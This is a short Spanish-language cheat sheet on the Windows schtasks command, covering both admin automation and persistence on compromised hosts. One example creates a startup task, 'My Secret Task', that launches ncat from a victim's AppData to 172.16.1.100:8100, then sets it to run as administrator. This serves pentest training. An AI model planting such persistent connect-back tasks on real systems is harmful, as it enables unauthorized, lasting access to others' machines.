Tareas Programadas (Windows CMD) — schtasks & Persistencia

#schtasks #windows #scheduled-tasks #persistence #cmd #powershell #task-scheduler #lateral-movement #ncat #pentesting #administrador

Las tareas programadas permiten ejecutar acciones automáticamente en un host según condiciones definidas (activadores).
Son útiles tanto para administradores 👨‍💻 como para pentesters 🕵️‍♂️:

Automatización de tareas rutinarias.
Persistencia en un host comprometido.

🔹 Qué son las tareas programadas

El Programador de tareas monitorea el host y ejecuta tareas cuando se cumplen ciertas condiciones.
Activadores comunes:
- Evento del sistema.
- Hora específica (diaria, semanal, mensual).
- Inicio del sistema.
- Inicio de sesión del usuario.
- Estado de inactividad.
- Cambios en sesiones de Terminal Server.

🔹 Comando `schtasks`

1️⃣ Consultar tareas existentes

SCHTASKS /Query /V /FO LIST

/V → Verbose, muestra propiedades avanzadas.
/FO LIST → Formato lista.
/NH → Sin encabezados de columna.
/S → Host remoto.
/U y /P → Usuario y contraseña si se consulta remoto.

💡 Ejemplo de salida:

TaskName: \Check Network Access
Task To Run: C:\Windows\System32\cmd.exe ping 8.8.8.8
Schedule Type: At system start up
Run As User: tru7h

2️⃣ Crear una nueva tarea

schtasks /create /sc ONSTART /tn "My Secret Task" /tr "C:\Users\Victim\AppData\Local\ncat.exe 172.16.1.100 8100"

/create → Crear tarea.
/sc → Tipo de horario (ONSTART, DAILY, WEEKLY, etc.).
/tn → Nombre de la tarea.
/tr → Acción o programa a ejecutar.
Opcionales:
- /ru → Usuario que ejecuta la tarea.
- /rp → Contraseña.
- /mo → Modificador de horario.
- /rl → Nivel de privilegios (LIMITED/HIGHEST).
- /z → Eliminar tarea al completar acción.

3️⃣ Modificar tarea existente

schtasks /change /tn "My Secret Task" /ru administrator /rp "P@ssw0rd"

/change → Modificar tarea.
/tn → Nombre de la tarea.
/tr → Cambiar acción ejecutable.
/ENABLE → Activar tarea.
/DISABLE → Desactivar tarea.

💡 Verificar cambios:

schtasks /query /tn "My Secret Task" /V /FO LIST

4️⃣ Ejecutar tarea inmediatamente

schtasks /run /tn "My Secret Task"

5️⃣ Eliminar tarea

schtasks /delete /tn "My Secret Task" /F

/F → Forzar eliminación sin pedir confirmación.